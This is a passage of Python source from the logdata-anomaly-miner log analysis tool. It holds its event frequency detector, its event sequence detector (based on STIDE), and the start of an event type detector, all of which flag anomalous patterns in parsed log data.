CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when event or value frequencies change.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, unique_path_list=None, window_size=600, num_windows=50, confidence_factor=0.33, empty_window_warnings=True, early_exceeding_anomaly_output=False, set_lower_limit=None, set_upper_limit=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, season=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. @param unique_path_list parser paths of values where only unique value occurrences should be counted for every value occurring in target_path_list. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param num_windows the number of previous time windows considered for expected frequency estimation. @param confidence_factor defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3*sigma deviation. confidence_factor must be in range [0, 1]. @param empty_window_warnings whether anomalies should be generated for too small window sizes. @param early_exceeding_anomaly_output states if an anomaly should be raised the first time the appearance count exceeds the range. @param set_lower_limit sets the lower limit of the frequency test to the specified value. @param set_upper_limit sets the upper limit of the frequency test to the specified value. @param persistence_id name of persistence document. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. @param season the seasonality/periodicity of the time-series in seconds. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, scoring_path_list=scoring_path_list, unique_path_list=unique_path_list, window_size=window_size, num_windows=num_windows, confidence_factor=confidence_factor, empty_window_warnings=empty_window_warnings, early_exceeding_anomaly_output=early_exceeding_anomaly_output, set_lower_limit=set_lower_limit, set_upper_limit=set_upper_limit, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.next_check_time = None self.counts = {} self.scoring_value_list = {} self.unique_values = {} self.ranges = {} self.exceeded_range_frequency = {} self.log_windows = 0 self.last_seen_log = {} if season is not None: lookback = math.ceil(season / window_size) if lookback > num_windows: logging.getLogger(DEBUG_LOG_NAME).warning(str(self.__class__.__name__) + ' requires num_windows to be at least ' + str(lookback) + '; seasonality is ignored.') self.lookback = None else: self.lookback = lookback else: self.lookback = None self.season = season self.time_index = {} self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False parser_match = log_atom.parser_match self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # Get values that occur in unique_path_list unique_path_value = None if self.unique_path_list is not None and len(self.unique_path_list) != 0: values = [] for path in self.unique_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) values.append(value) # Initialize unique values for current log event if log_event not in self.unique_values: self.unique_values[log_event] = set() unique_path_value = tuple(values) # Store copy of last seen instance of raw log event to correctly show affected event type when anomaly occurs. self.last_seen_log[log_event] = log_atom if self.season is not None and log_event not in self.time_index: self.time_index[log_event] = [math.floor((log_atom.atom_time % self.season) / self.window_size)] if self.next_check_time is None: # First processed log atom, initialize next check time. self.next_check_time = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time: # Log atom exceeded next check time; time window is complete. self.next_check_time += self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time: skipped_windows = 1 + math.floor((log_atom.atom_time - self.next_check_time) / self.window_size) self.next_check_time = self.next_check_time + skipped_windows * self.window_size # Output anomaly in case that no log event occurs within a time window if self.empty_window_warnings is True: analysis_component = {"AffectedLogAtomPaths": self.target_path_list} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "No log events received in time window", [""], event_data, log_atom, self) for log_ev in self.counts: if log_ev not in self.last_seen_log: # In case that the AMiner was restarted, it is possible that no instance of the event has been seen; # use current log atom instead self.last_seen_log[log_ev] = log_atom # Check if ranges should be initialised if log_ev not in self.ranges: self.ranges[log_ev] = None self.exceeded_range_frequency[log_ev] = False # Calculate the ranges if it was not already calculated if self.ranges[log_ev] is None: self.ranges[log_ev] = self.calculate_range(log_ev) if log_ev not in self.counts or (len(self.counts[log_ev]) < 2 and ( self.set_lower_limit is None or self.set_upper_limit is None)): # At least counts from 1 window necessary for prediction self.reset_counter(log_ev, log_atom) continue # Compare log event frequency of previous time windows and current time window if self.counts[log_ev][-1] < self.ranges[log_ev][0] or self.counts[log_ev][-1] > self.ranges[log_ev][1]: occurrences_mean = (self.ranges[log_ev][0] + self.ranges[log_ev][1]) / 2 try: data = self.last_seen_log[log_ev].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.last_seen_log[log_ev].raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.last_seen_log[log_ev].parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_ev)} confidence = 1 if max(occurrences_mean, self.counts[log_ev][-1]) != 0: confidence = 1 - min(occurrences_mean, self.counts[log_ev][-1]) / max(occurrences_mean, self.counts[log_ev][-1]) frequency_info = {"ExpectedLogAtomValuesFrequency": occurrences_mean, "ExpectedLogAtomValuesFrequencyRange": [ np.ceil(max(0, self.ranges[log_ev][0])), np.floor(self.ranges[log_ev][1])], "LogAtomValuesFrequency": self.counts[log_ev][-1], "WindowSize": self.window_size, "ConfidenceFactor": self.confidence_factor, "Confidence": confidence} # In case that scoring_path_list is set, give their values to the event handlers for further analysis. if len(self.scoring_path_list) > 0: frequency_info["IdValues"] = self.scoring_value_list[log_ev] event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency anomaly detected", sorted_log_lines, event_data, self.last_seen_log[log_ev], self) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Reset exceeded_range_frequency to output a warning when the count exceedes the ranges next time self.exceeded_range_frequency[log_ev] = False # Reset counter and range estimation for _ in range(skipped_windows + 1): self.reset_counter(log_ev, log_atom) self.ranges[log_ev] = None # Reset all stored unique values for every log event for log_ev in self.unique_values: self.unique_values[log_ev] = set() elif self.early_exceeding_anomaly_output and log_event in self.counts and (len(self.counts[log_event]) >= 2 or ( self.set_lower_limit is not None and self.set_upper_limit is not None)): # Check if the count exceeds the range and output a warning the first time the range exceeds it if log_event not in self.ranges: self.ranges[log_event] = None self.exceeded_range_frequency[log_event] = False # Calculate the ranges if it was not already calculated if self.ranges[log_event] is None: self.ranges[log_event] = self.calculate_range(log_event) # Compare log event frequency of previous time windows and current time window if self.counts[log_event][-1] > self.ranges[log_event][1] and not self.exceeded_range_frequency[log_event]: occurrences_mean = (self.ranges[log_event][0] + self.ranges[log_event][1]) / 2 self.exceeded_range_frequency[log_event] = True try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_event)} frequency_info = {"ExpectedLogAtomValuesFrequency": occurrences_mean, "ExpectedLogAtomValuesFrequencyRange": [ np.ceil(max(0, self.ranges[log_event][0])), np.floor(self.ranges[log_event][1])], "LogAtomValuesFrequency": self.counts[log_event][-1], "WindowSize": self.window_size, "ConfidenceFactor": self.confidence_factor} event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency exceeds range for the first time", sorted_log_lines, event_data, log_atom, self) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Increase count for observed events if log_event in self.counts: if unique_path_value is not None: # When unique path is set, only increase count when value has not been observed before if unique_path_value not in self.unique_values[log_event]: self.counts[log_event][-1] += 1 self.unique_values[log_event].add(unique_path_value) else: self.counts[log_event][-1] += 1 else: self.counts[log_event] = [1] self.log_success += 1 # Switching the learn mode is placed at the end of receive_atom to ensure that last time window before switching is added to model if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".") self.learn_mode = False return True def reset_counter(self, log_event, log_atom): """Create count index for new time window.""" if self.learn_mode is True: if len(self.counts[log_event]) <= self.num_windows + 1: self.counts[log_event].append(0) else: self.counts[log_event] = self.counts[log_event][1:] + [0] else: self.counts[log_event][-1] = 0 if self.lookback is not None: # Update seasonal index of value to be predicted if log_event in self.time_index: self.time_index[log_event].append((self.time_index[log_event][-1] + 1) % self.lookback) # Align length of self.time_index to self.counts self.time_index[log_event] = self.time_index[log_event][-len(self.counts[log_event]):] else: self.time_index[log_event] = [math.floor((log_atom.atom_time % self.season) / self.window_size)] # Reset scoring_value_list if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = [] def calculate_range(self, log_event): """Calculate the corresponding range to log_event.""" if self.set_lower_limit is None or self.set_upper_limit is None: if log_event not in self.counts or len(self.counts[log_event]) < 2: return None season_offset = 0 if self.lookback is not None and len(self.counts[log_event]) > self.lookback + 2: counts_tmp = [] season_offset_list = [] current_index = self.time_index[log_event][-1] for i in range(0, len(self.counts[log_event]) - 1): # Get all values where lag of size season can be differentiated if i >= self.lookback: counts_tmp.append(self.counts[log_event][i] - self.counts[log_event][i - self.lookback]) # Get all values that lag a multiple of seasonality lookback behind if self.time_index[log_event][i] == current_index: season_offset_list.append(self.counts[log_event][i]) season_offset = np.mean(season_offset_list) else: counts_tmp = self.counts[log_event] occurrences_mean = -1 occurrences_std = -1 occurrences_mean = np.mean(counts_tmp[-self.num_windows-1:-1]) if len(counts_tmp[-self.num_windows-1:-1]) > 1: # Only compute standard deviation for at least 2 observed counts occurrences_std = np.std(counts_tmp[-self.num_windows-1:-1]) else: # Otherwise use default value so that only (1 - confidence_factor) relevant (other factor cancels out) occurrences_std = np.mean(self.counts[log_event][-self.num_windows-1:-1]) * (1 - self.confidence_factor) # Calculate limits if self.set_lower_limit is not None: lower_limit = self.set_lower_limit else: lower_limit = occurrences_mean + season_offset - occurrences_std / self.confidence_factor if self.set_upper_limit is not None: upper_limit = self.set_upper_limit else: upper_limit = occurrences_mean + season_offset + occurrences_std / self.confidence_factor return [lower_limit, upper_limit] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] for log_ev, freqs in self.counts.items(): # Skip last count as the time window may not be complete yet and count thus too low time_ind = [] if log_ev in self.time_index: time_ind = self.time_index[log_ev][:-1] persist_data.append((log_ev, freqs[:-1], time_ind)) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + " persisted data.") def load_persistence_data(self): """Load the persistence data from storage.""" # Persisted data contains lists of event-frequency pairs, i.e., # [[, [], []], [, [], []], ...] persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for entry in persistence_data: log_event = entry[0] freqs = entry[1] time_ind = entry[2] # In case that num_windows differ, only take as many as possible self.counts[tuple(log_event)] = freqs[max(0, len(freqs) - self.num_windows - 1):] + [0] if len(time_ind) > 0: self.time_index[tuple(log_event)] = time_ind[max(0, len(freqs) - self.num_windows - 1):] # Add another time index to fit new length of self.counts self.time_index[tuple(log_event)].append((self.time_index[tuple(log_event)][-1] + 1) % self.lookback) if len(self.scoring_path_list) > 0: self.scoring_value_list[tuple(log_event)] = [] logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + " loaded persistence data.") def print_persistence_event(self, event_type, event_data): """Prints the persistency of component_name. Event_data specifies what information is outputed. @return a message with information about the persistency. @throws Exception when the output for the event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and (self.target_path_list is None or ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)])) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format. " \ "The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same " \ "length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.counts.keys()) values_list = list(values_set) values_list.sort() string = f"Event frequency is tracked for the following path values: {values_list}" elif len(event_data) == 1: # Set output string if event_data[0] in self.counts and self.ranges[event_data[0]] is not None: if self.counts[event_data[0]][-1] < self.ranges[event_data[0]][0] or\ self.counts[event_data[0]][-1] > self.ranges[event_data[0]][1]: string = f"The current count {self.counts[event_data[0]][-1]} is outside the frequency interval ["\ f"{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. "\ f"The count will reset at {self.next_check_time} (unix time stamp)" else: string = f"The current count {self.counts[event_data[0]][-1]} is in the frequency interval ["\ f"{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. "\ f"The count will reset at {self.next_check_time} (unix time stamp)" else: string = f"Persistency includes no information for {event_data[0]}." return string def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + " out of " + str(self.log_total) + " log atoms successfully in " + str(self.log_windows) + " time windows in the last 60 minutes.") elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + " out of " + str(self.log_total) + " log atoms successfully in " + str(self.log_windows) + " time windows in the last 60 minutes.") self.log_success = 0 self.log_total = 0 self.log_windows = 0 def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ["FrequencyData", "IdValues"] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ["FrequencyData", "Scoring"] return [] EventSequenceDetector.py000066400000000000000000000416701500476301700355750ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest, S., Hofmeyr, S. A., Somayaji, A., & Longstaff, T. A. (1996, May). A sense of self for unix processes. In Proceedings of the 1996 IEEE Symposium on Security and Privacy (pp. 120-128). IEEE. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventSequenceDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when new event or value sequences were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, seq_len=3, allow_missing_id=False, timeout=None, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available. @param seq_len the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param timeout maximum allowed seconds between two entries of sequence; sequence is split in subsequences if exceeded. @param persistence_id name of persistence file. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, seq_len=seq_len, allow_missing_id=allow_missing_id, timeout=timeout, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.sequences = set() self.current_sequences = {} self.last_seen_times = {} self.log_learned = 0 self.log_learned_sequences = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False parser_match = log_atom.parser_match self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) # the match variable is not needed any more and reused for the iteration. for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. return False else: matches = [] if isinstance(id_match, list): matches = id_match else: matches.append(id_match) for match in matches: if isinstance(match.match_object, bytes): id_tuple += (match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (match.match_object,) # Create entry for the id_tuple in the current_sequences dict if it did not occur before. if id_tuple not in self.current_sequences: self.current_sequences[id_tuple] = () # If too much time passed between two values, start a new sequence if self.timeout is not None: if id_tuple in self.last_seen_times and self.last_seen_times[id_tuple] is not None and \ log_atom.atom_time is not None and self.last_seen_times[id_tuple] + self.timeout < log_atom.atom_time: self.current_sequences[id_tuple] = () self.last_seen_times[id_tuple] = log_atom.atom_time # If the sequence has not reached its full length, append the newest element and stop. # Otherwise, the current sequence is used as a queue, where the oldest entry is removed. if len(self.current_sequences[id_tuple]) < self.seq_len: self.current_sequences[id_tuple] += (log_event,) if len(self.current_sequences[id_tuple]) != self.seq_len: self.log_success += 1 return True else: self.current_sequences[id_tuple] = self.current_sequences[id_tuple][1:] + (log_event,) # Report anomalies if the current processed sequence never occurred before. if self.current_sequences[id_tuple] not in self.sequences: if self.learn_mode is True: self.sequences.add(self.current_sequences[id_tuple]) self.log_learned += 1 self.log_learned_sequences.append(self.current_sequences[id_tuple]) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] if self.target_path_list is None or len(self.target_path_list) == 0: analysis_component = {"AffectedLogAtomPaths": self.current_sequences[id_tuple]} else: analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(self.current_sequences[id_tuple])} if self.id_path_list is not None: analysis_component["AffectedIdValues"] = list(id_tuple) event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New sequence detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.sequences))) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" # Persisted data contains lists of sequences, i.e., [[, ], [. """ import logging from aminer import AminerConfig from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class EventTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class keeps track of the found event types and the values of each variable.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id="Default", target_path_list=None, id_path_list=None, allow_missing_id=False, allowed_id_tuples=None, min_num_vals=1000, max_num_vals=1500, save_values=True, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param id_path_list specifies group identifiers for which data should be learned/analyzed. One or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of 